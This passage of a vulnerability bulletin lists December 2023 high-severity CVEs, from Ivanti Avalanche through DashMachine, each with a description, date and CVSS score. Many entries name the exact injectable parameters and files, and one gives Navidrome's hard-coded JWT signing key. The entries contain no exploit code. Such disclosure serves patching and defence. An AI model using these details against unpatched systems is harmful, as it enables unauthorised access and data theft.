ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS). | 2023-12-19 | 7.5 | CVE-2023-46803
ivanti — avalanche | An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS). | 2023-12-19 | 7.5 | CVE-2023-46804
ivanti — connect_secure | A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance. | 2023-12-16 | 7.5 | CVE-2023-39340
jetbrains — teamcity | In JetBrains TeamCity before 2023.11.1 a CSRF on login was possible. | 2023-12-15 | 8.8 | CVE-2023-50870
kaifa — webitr_attendance_system | Kaifa Technology WebITR is an online attendance system. It has a vulnerability in its use of a hard-coded encryption key. An unauthenticated remote attacker can generate a valid token parameter and exploit this vulnerability to access the system with an arbitrary user account, including the administrator’s account, to exercise the logged-in account’s permissions and obtain relevant information. | 2023-12-15 | 9.8 | CVE-2023-48392
kaifa_technology — webitr_attendance_system | Kaifa Technology WebITR is an online attendance system. Its file uploading function does not restrict upload of files with dangerous types. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary commands or disrupt service. | 2023-12-15 | 8.8 | CVE-2023-48394
kakadu_software_pty_ltd — kakadu_sdk | JPX Fragment List (flst) box vulnerability in Kakadu 7.9 allows an attacker to exfiltrate local and remote files reachable by a server if the server allows the attacker to upload a specially crafted image that is displayed back to the attacker. | 2023-12-20 | 7.5 | CVE-2023-6562
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘cmbQual’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49677
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDesc’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49678
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTitle’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49679
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTotal’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49680
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘cmbQual’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49681
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDate’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49682
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDesc’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-49683
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTitle’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49684
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTime’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49685
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTotal’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49686
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtPass’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49687
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtUser’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49688
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘JobId’ parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49689
kashipara_group — job_portal | Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘WalkinId’ parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-22 | 9.8 | CVE-2023-49690
kashipara_group — student_information_system | Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘id’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-5007
kashipara_group — student_information_system | Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘coursecode’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-5010
kashipara_group — student_information_system | Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘coursename’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-5011
kodcloud — kodbox | A vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability. | 2023-12-16 | 9.8 | CVE-2023-6848
kodcloud — kodbox | A vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability. | 2023-12-16 | 9.8 | CVE-2023-6849
kodcloud — kodexplorer | A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability. | 2023-12-16 | 9.8 | CVE-2023-6850
kodcloud — kodexplorer | A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219. | 2023-12-16 | 9.8 | CVE-2023-6851
kodcloud — kodexplorer | A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220. | 2023-12-16 | 9.8 | CVE-2023-6852
kodcloud — kodexplorer | A vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability. | 2023-12-16 | 9.8 | CVE-2023-6853
kylinsoft — hedron-domain-hook | A vulnerability was found in KylinSoft hedron-domain-hook up to 3.8.0.12-0k0.5. It has been declared as critical. This vulnerability affects the function init_kcm of the component DBus Handler. The manipulation leads to improper access controls. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-248578 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 7.8 | CVE-2023-7025
lfprojects — mlflow | Path Traversal: ‘\..\filename’ in GitHub repository mlflow/mlflow prior to 2.9.2. | 2023-12-15 | 8.1 | CVE-2023-6831
linux — kernel | A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system. | 2023-12-21 | 7.8 | CVE-2023-6546
linux — kernel | A heap out-of-bounds write vulnerability in the Linux kernel’s Performance Events system component can be exploited to achieve local privilege escalation. A perf_event’s read_size can overflow, leading to a heap out-of-bounds increment or write in perf_read_group(). We recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b. | 2023-12-19 | 7.8 | CVE-2023-6931
linux — kernel | A use-after-free vulnerability in the Linux kernel’s ipv4: igmp component can be exploited to achieve local privilege escalation. A race condition can be exploited to cause a timer to be mistakenly registered on an RCU read locked object which is freed by another thread. We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1. | 2023-12-19 | 7.8 | CVE-2023-6932
linux — linux_kernel | A use-after-free vulnerability in the Linux kernel’s netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_pipapo_walk did not skip inactive elements during set walk which could lead to double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free. We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a. | 2023-12-18 | 7.8 | CVE-2023-6817
m-files_corporation — m-files_server | Lack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords. | 2023-12-20 | 7.5 | CVE-2023-6912
majordomo — majordomo | MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager. | 2023-12-15 | 9.8 | CVE-2023-50917
master_slider — master_slider_pro | Deserialization of Untrusted Data vulnerability in Master Slider Master Slider Pro. This issue affects Master Slider Pro: from n/a through 3.6.5. | 2023-12-20 | 7.1 | CVE-2023-47507
mindsdb — mindsdb | MindsDB is a SQL Server for artificial intelligence. Prior to version 23.11.4.1, the `put` method in `mindsdb/mindsdb/api/http/namespaces/file.py` does not validate the user-controlled name value, which is used in a temporary file name, which is afterwards opened for writing on lines 122-125, which leads to path injection. Later in the method, the temporary directory is deleted on line 151, but since we can write outside of the directory using the path injection vulnerability, the potentially dangerous file is not deleted. Arbitrary file contents can be written due to `f.write(chunk)` on line 125. Mindsdb does check later on line 149 in the `save_file` method in `file-controller.py` which calls the `_handle_source` method in `file_handler.py` if a file is of one of the types `csv`, `json`, `parquet`, `xls`, or `xlsx`. However, since the check happens after the file has already been written, the files will still exist (and will not be removed due to the path injection described earlier), just the `_handle_source` method will return an error. The same user-controlled source is also used in another path injection sink on line 138. This leads to another path injection, which allows an attacker to delete any `zip` or `tar.gz` files on the server. | 2023-12-22 | 9.1 | CVE-2023-50731
misp — misp | app/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs. | 2023-12-15 | 9.8 | CVE-2023-50918
mlflow — mlflow | Path Traversal: ‘\..\filename’ in GitHub repository mlflow/mlflow prior to 2.9.2. | 2023-12-18 | 7.5 | CVE-2023-6909
moxa — iologik_e1200_series | A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user. | 2023-12-23 | 8.8 | CVE-2023-5961
mozilla — firefox | TypedArrays can be fallible and lacked proper exception handling. This could lead to abuse in other APIs which expect TypedArrays to always succeed. This vulnerability affects Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6866
mozilla — firefox | Memory safety bugs present in Firefox 120. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6873
mozilla — firefox_esr/thunderbird | A use-after-free was identified in the `nsDNSService::Init`. This issue appears to manifest rarely during start-up. This vulnerability affects Firefox ESR < 115.6 and Thunderbird < 115.6. | 2023-12-19 | 8.8 | CVE-2023-6862
mozilla — multiple_products | The WebGL `DrawElementsInstanced` method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6856
mozilla — multiple_products | Firefox was susceptible to a heap buffer overflow in `nsTextFragment` due to insufficient OOM handling. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6858
mozilla — multiple_products | A use-after-free condition affected TLS socket creation when under memory pressure. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6859
mozilla — multiple_products | The `nsWindow::PickerOpen(void)` method was susceptible to a heap buffer overflow when running in headless mode. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6861
mozilla — multiple_products | The `ShutdownObserver()` was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6863
mozilla — multiple_products | Memory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. | 2023-12-19 | 8.8 | CVE-2023-6864
mr-corner — amazing_little_poll | Authentication bypass vulnerability in Amazing Little Poll affecting versions 1.3 and 1.4. This vulnerability could allow an unauthenticated user to access the admin panel without providing any credentials by simply accessing the “lp_admin.php?adminstep=” parameter. | 2023-12-20 | 9.8 | CVE-2023-6768
multisuns — easylog_web+_firmware | Multisuns EasyLog web+ has a vulnerability of using hard-coded credentials. A remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service. | 2023-12-15 | 9.8 | CVE-2023-48388
multisuns — easylog_web+_firmware | Multisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service. | 2023-12-15 | 9.8 | CVE-2023-48390
multisuns — easylog_web+_firmware | Multisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. | 2023-12-15 | 7.5 | CVE-2023-48389
navidrome — navidrome | Navidrome is an open source web-based music collection server and streamer. A security vulnerability has been identified in navidrome’s subsonic endpoint, allowing for authentication bypass. This exploit enables unauthorized access to any known account by utilizing a JSON Web Token (JWT) signed with the key “not so secret”. The vulnerability can only be exploited on instances that have never been restarted. Navidrome supports an extension to the subsonic authentication scheme, where a JWT can be provided using a `jwt` query parameter instead of the traditional password or token and salt (corresponding to resp. the `p` or `t` and `s` query parameters). This authentication bypass vulnerability potentially affects all instances that don’t protect the subsonic endpoint `/rest/`, which is expected to be most instances in a standard deployment, and most instances in the reverse proxy setup too (as the documentation mentions to leave that endpoint unprotected). This issue has been patched in version 0.50.2. | 2023-12-21 | 8.6 | CVE-2023-51442
netentsec — application_security_gateway | A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file /admin/singlelogin.php?submit=1. The manipulation of the argument loginId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248265 was assigned to this vulnerability. | 2023-12-17 | 9.8 | CVE-2023-6903
netgear — wnr2000_firmware | A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication. | 2023-12-15 | 9.8 | CVE-2023-50089
nxfilter — nxfilter | A vulnerability, which was classified as problematic, has been found in Jahastech NxFilter 4.3.2.5. This issue affects some unknown processing of the file user,adap.jsp?actionFlag=test&id=1 of the component Bind Request Handler. The manipulation leads to ldap injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-248267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-18 | 9.8 | CVE-2023-6905
nxfilter — nxfilter | A vulnerability classified as problematic was found in Jahastech NxFilter 4.3.2.5. This vulnerability affects unknown code of the file /config,admin.jsp. The manipulation of the argument admin_name leads to cross-site request forgery. The attack can be initiated remotely. VDB-248266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-17 | 8.8 | CVE-2023-6904
octokit — app | octokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the nodejs process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Protobot 12.3.3. | 2023-12-15 | 7.5 | CVE-2023-50728
openbsd — openssh | In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name. | 2023-12-18 | 9.8 | CVE-2023-51385
openimageio — openimageio | A vulnerability was found in OpenImageIO, where a heap buffer overflow exists in the src/gif.imageio/gifinput.cpp file. This flaw allows a remote attacker to pass a specially crafted file to the application, which triggers a heap-based buffer overflow and could cause a crash, leading to a denial of service. | 2023-12-18 | 7.5 | CVE-2023-3430
panasonic — control_fpwin_pro | Stack-based buffer overflow in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file. | 2023-12-19 | 7.8 | CVE-2023-6314
panasonic — control_fpwin_pro | Out-of-bounds read vulnerability in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file. | 2023-12-19 | 7.8 | CVE-2023-6315
peazip — peazip | A vulnerability has been found in PeaZip 9.4.0 and classified as problematic. Affected by this vulnerability is an unknown functionality in the library dragdropfilesdll.dll of the component Library Handler. The manipulation leads to uncontrolled search path. An attack has to be approached locally. Upgrading to version 9.6.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248251. NOTE: Vendor was contacted early, confirmed the existence of the flaw and immediately worked on a patched release. | 2023-12-17 | 7.8 | CVE-2023-6891
perl — perl | A vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker-controlled byte buffer overflow in a heap-allocated buffer. | 2023-12-18 | 7 | CVE-2023-47038
phz76 — rtspserver | A vulnerability classified as critical was found in PHZ76 RtspServer 1.0.0. This vulnerability affects the function ParseRequestLine of the file RtspMesaage.cpp. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-17 | 9.8 | CVE-2023-6888
projectworlds — online_voting_system_project | Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the login_action.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-48433
projectworlds — online_voting_system_project | Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the reg_action.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-20 | 9.8 | CVE-2023-48434
projectworlds_pvt._limited — leave_management_system_project | Leave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘setearnleave’ parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 8.8 | CVE-2023-44481
projectworlds_pvt._limited — leave_management_system_project | Leave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘setsickleave’ parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 8.8 | CVE-2023-44482
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘ch’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45115
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘demail’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45116
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘eid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45117
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘fdid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45118
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘n’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45119
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘qid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45120
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘desc’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45121
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘name’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45122
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘right’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45123
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘tag’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45124
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘time’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45125
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘total’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45126
projectworlds_pvt._limited — online_examination_system | Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘wrong’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-45127
projectworlds_pvt._limited — online_matrimonial_project | Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘filename’ attribute of the ‘pic3’ multipart parameter of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-46791
projectworlds_pvt._limited — railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘psd’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48685
projectworlds_pvt._limited — railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘user’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48686
projectworlds_pvt._limited — railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘from’ parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48687
projectworlds_pvt._limited — railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘to’ parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48688
projectworlds_pvt._limited — railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘byname’ parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48689
projectworlds_pvt._limited — railway_reservation_system | Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘bynum’ parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48690
projectworlds_pvt._limited — student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_id’ parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48716
projectworlds_pvt._limited — student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48717
projectworlds_pvt._limited — student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48718
projectworlds_pvt._limited — student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘roll_no’ parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48719
projectworlds_pvt._limited — student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘password’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48720
projectworlds_pvt._limited — student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48722
projectworlds_pvt._limited — student_result_management_system | Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘rno’ parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database. | 2023-12-21 | 9.8 | CVE-2023-48723
redpanda — redpanda | Redpanda before 23.1.21 and 23.2.x before 23.2.18 has missing authorization checks in the Transactions API. | 2023-12-18 | 9.8 | CVE-2023-50976
rmountjoy92 — dashmachine | A vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability. | 2023-12-17 | 9.8 | CVE-2023-6899
rmountjoy92 — dashmachine | A vulnerability, which was classified as critical, has been found in rmountjoy92 DashMachine 0.5-4. Affected by this issue is some unknown functionality of the file /settings/delete_file. The manipulation of the argument file leads to path traversal: ‘../filedir’. The exploit has been disclosed to the public and may be used. VDB-248258 is the identifier assigned to this vulnerability. | 2023-12-17 | 9.1 | CVE-2023-6900
